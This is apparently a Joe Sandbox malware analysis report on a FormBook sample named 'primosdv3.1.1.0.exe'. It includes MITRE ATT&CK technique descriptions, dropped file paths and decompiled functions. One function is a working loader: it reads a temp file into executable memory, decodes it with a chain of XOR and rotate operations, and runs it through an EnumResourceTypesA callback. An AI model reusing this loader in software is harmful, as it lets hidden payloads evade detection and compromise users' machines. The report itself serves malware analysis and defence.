API ID:
String ID:
API String ID:
Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction ID: 1ec1c7ec64ec048f456b6658e745821db493b65c822a602432908b2b4415f3b8
Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction Fuzzy Hash: 0531A035208205DFC725DF29C984AAAB7A6FF85314B54CA5EE45A8B391DB31F803CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040E471 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65204d8bc159427b67e4e8932a623481158fcaf48126f80aabaa069acfc2f96
Instruction ID: d5de7f5ebb4acf7de4b4ccdd81e01b7d6f854b4d153f9edc02faa382a0b824bd
Opcode Fuzzy Hash: a65204d8bc159427b67e4e8932a623481158fcaf48126f80aabaa069acfc2f96
Instruction Fuzzy Hash: 0CC01223E9A09D058A229CAA3C900F8FBA08683265A1827EBC888B3400C905C14D13A8

Uniqueness

Uniqueness Score: -1.00%

Function 001D1000 Relevance: 12.2, APIs: 8, Instructions: 197
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				signed int _v5;
				signed int _v12;
				void* _v16;
				void* _v20;
				long _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				short _v572;
				long _t116;
				void* _t118;
				void* _t119;
				int _t124;

				_v48 =  *0x1d3000;
				_v44 =  *0x1d3004;
				_v40 =  *0x1d3008;
				_v36 =  *0x1d300c;
				_v32 =  *0x1d3010;
				_v12 = 0;
				_v28 = GetProcAddress(GetModuleHandleW(0x1d3020), 0x1d3014);
				_t116 = GetTempPathW(0x103,  &_v572);
				if(_t116 != 0) {
					_t118 = _v28( &_v572,  &_v48);
					if(_t118 != 0) {
						_t119 = CreateFileW( &_v572, 0x80000000, 1, 0, 3, 0x80, 0);
						_v20 = _t119;
						if(_v20 != 0xffffffff) {
							_v24 = GetFileSize(_v20, 0);
							_v16 = VirtualAlloc(0, _v24, 0x3000, 0x40);
							_t124 = ReadFile(_v20, _v16, _v24,  &_v52, 0);
							if(_t124 != 0) {
								_v12 = 0;
								while(_v12 < _v24) {
									_v5 =  *((intOrPtr*)(_v16 + _v12));
									_v5 = _v5 & 0x000000ff ^ 0x000000bd;
									_v5 =  !(_v5 & 0x000000ff);
									_v5 = (_v5 & 0x000000ff) - 0x9d;
									_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 =  ~(_v5 & 0x000000ff);
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - 0x8e;
									_v5 =  !(_v5 & 0x000000ff);
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 =  ~(_v5 & 0x000000ff);
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 =  ~(_v5 & 0x000000ff);
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
									_v5 = (_v5 & 0x000000ff) + 0x3c;
									_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - 0xb4;
									 *((char*)(_v16 + _v12)) = _v5;
									_v12 = _v12 + 1;
								}
								return EnumResourceTypesA(0, _v16, 0);
							}
							return _t124;
						}
						return _t119;
					}
					return _t118;
				}
				return _t116;
			}

0x001d100e
0x001d1017
0x001d1020
0x001d1028
0x001d1031
0x001d1034
0x001d1052
0x001d1061
0x001d1069
0x001d107b
0x001d1080
0x001d10a0
0x001d10a6
0x001d10ad
0x001d10c0
0x001d10d6
0x001d10eb
0x001d10f3
0x001d10fa
0x001d110c
0x001d1120
0x001d112d
0x001d1136
0x001d1142
0x001d1154
0x001d115e
0x001d1168
0x001d1171
0x001d117b
0x001d1188
0x001d1191
0x001d119b
0x001d11a5
0x001d11ae
0x001d11b8
0x001d11cb
0x001d11d5
0x001d11de
0x001d11e8
0x001d11f2
0x001d1205
0x001d120f
0x001d1222
0x001d122c
0x001d1236
0x001d1240
0x001d1253
0x001d125d
0x001d1267
0x001d1274
0x001d1280
0x001d1109
0x001d1109
0x00000000
0x001d128f
0x00000000
0x001d10f3
0x00000000
0x001d10ad
0x00000000
0x001d1080
0x00000000

APIs

GetModuleHandleW.KERNEL32(001D3020,001D3014), ref: 001D1045
GetProcAddress.KERNEL32(00000000), ref: 001D104C
GetTempPathW.KERNEL32(00000103,?), ref: 001D1061

Memory Dump Source

Source File: 00000002.00000002.367221173.00000000001D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000002.00000002.367209135.00000000001D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.367241059.00000000001D2000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.367253042.00000000001D4000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d0000_bstkiooen.jbxd

Similarity

API ID: AddressHandleModulePathProcTemp
String ID:
API String ID: 775647363-0
Opcode ID: 7504f6a430cdb4aed45c684a6eac368ef9034fe0a6a8fc5417f925040256b6a0
Instruction ID: 2e980c9f8ccd5fbda97ec5e0156afcaa376a61b5b5e6c705981bb2a488f9a795
Opcode Fuzzy Hash: 7504f6a430cdb4aed45c684a6eac368ef9034fe0a6a8fc5417f925040256b6a0
Instruction Fuzzy Hash: DA912E74D4D3D8BECB05CBF984547EDBFB19F5A201F0881CAE1A1A6382C635538ADB21

Uniqueness

Uniqueness Score: -1.00%

Function 0167645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0167645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x173d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0168FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E01662280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E0165FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x173b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0168B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x0167645b
0x01676463
0x0167646d
0x01676475
0x0167647a
0x0167647e
0x01676480
0x0167648c
0x01676490
0x01676495
0x01676498
0x0167649b
0x0167649f
0x016764a1
0x016b7c07
0x016b7c09
0x016b7c0c
0x00000000
0x016764a7
0x016764a7
0x016764aa
0x016b7bf7
0x016b7c00
0x00000000
0x016b7bf9
0x016b7bf9
0x016b7bf9
0x016764b0
0x016764b0
0x016764b2
0x016764b2
0x016764b3
0x016764ba
0x01676553
0x0167655e
0x01676566
0x0167656c
0x01676575
0x0167657f
0x01676585
0x01676588
0x01676588
0x016764c7
0x016764cb
0x016764ce
0x016764d3
0x016764da
0x016764e5
0x016764ed
0x016764f1
0x016764f5
0x016764f6
0x016764fa
0x01676502
0x01676503
0x01676504
0x01676507
0x0167651a
0x01676524
0x01676524
0x01676526
0x01676526
0x016764aa
0x0167652c
0x0167652d
0x0167652e
0x01676539

APIs

RtlDebugPrintTimes.NTDLL ref: 0167651A

Strings

0, xrefs: 016764FA
0, xrefs: 016764E5

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 6ae5a70e927037f8fac85a5d75016b739bc1a9eae488ef7adb2f86c8d43012b9
Instruction ID: 40a10e6f7314fe14a40f4dbaa851bb19d04da19c4cc22902f12b60f2a3c61051
Opcode Fuzzy Hash: 6ae5a70e927037f8fac85a5d75016b739bc1a9eae488ef7adb2f86c8d43012b9
Instruction Fuzzy Hash: A6417EB16057029FD311CF28C884A5ABBE5FB88714F04866EF989DB341D731EA49CB86

Uniqueness

Uniqueness Score: -1.00%

Function 016DFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E016DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0168CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E016D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E016D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x016dfdda
0x016dfde2
0x016dfde5
0x016dfdec
0x016dfdfa
0x016dfdff
0x016dfe0a
0x016dfe0f
0x016dfe17
0x016dfe1e
0x016dfe19
0x016dfe19
0x016dfe19
0x016dfe20
0x016dfe21
0x016dfe22
0x016dfe25
0x016dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016DFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016DFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016DFE01

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 02db261081456c08a23440bbb23bfc58403dc16acbd5d9dff9875968c08074c2
Instruction ID: 77665d98c5abdb65e57d4aacab0945ab84e8467611a04cb553591576fb0be3e8
Opcode Fuzzy Hash: 02db261081456c08a23440bbb23bfc58403dc16acbd5d9dff9875968c08074c2
Instruction Fuzzy Hash: 8AF0F672A00202BFE6341A45DC06F33BF6BEB84B30F254318F629565D1DA62F82086F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report primosdv3.1.1.0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F61A.tmp

C:\Users\user\AppData\Local\Temp\bstkiooen.exe

C:\Users\user\AppData\Local\Temp\hbmpmcwm.tfz

C:\Users\user\AppData\Local\Temp\hgmxh.brz

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
primosdv3.1.1.0.exe

Function 00C7DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Function 00C7A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Function 00C6A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Function 00C87DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 00C6848E Relevance: 2.5, APIs: 1, Instructions: 960
COMMONCrypto

Function 00C7F9D5 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 00C76CDC Relevance: .3, Instructions: 343
COMMONCrypto

Function 00C7B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731
windowfilesleepCOMMON

Function 00C70863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Function 00C7C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Function 00C6DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663
COMMON

Function 00C7D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Function 00C7D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Function 00C8A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre